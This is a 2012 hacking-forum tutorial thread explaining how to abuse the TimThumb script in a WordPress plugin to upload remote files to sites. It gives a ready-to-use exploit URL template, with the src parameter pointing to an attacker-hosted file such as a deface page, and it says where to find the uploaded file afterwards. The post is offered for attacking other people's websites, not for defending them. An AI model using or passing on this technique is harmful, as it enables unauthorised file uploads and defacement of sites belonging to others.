![]() |
|
Timthumb Remote Upload Vuln in Wordpress - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: Timthumb Remote Upload Vuln in Wordpress (/Thread-Timthumb-Remote-Upload-Vuln-in-Wordpress) |
Timthumb Remote Upload Vuln in Wordpress - #Unkn0wn - 05-18-2012 Hello guys, I'm back with another hacking tutorial for you, This tutorial about "TimThumb" vuln in Wordpress websites.
This bug known as "timthumb.php" exploit First we need to find website, running on the wordpress platform and exploit is http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat If you need example, Here we go. http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.yourwebsite.com/deface.html After done with this url that file will remotely upload to that wordpress website. After uploading, Go to below link to access your file http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere (File will upload with a random name like fe051145b78d04cb3345cff7e1b3cf05b77, Check last file to view your file) If you have any problem, Ask it in here |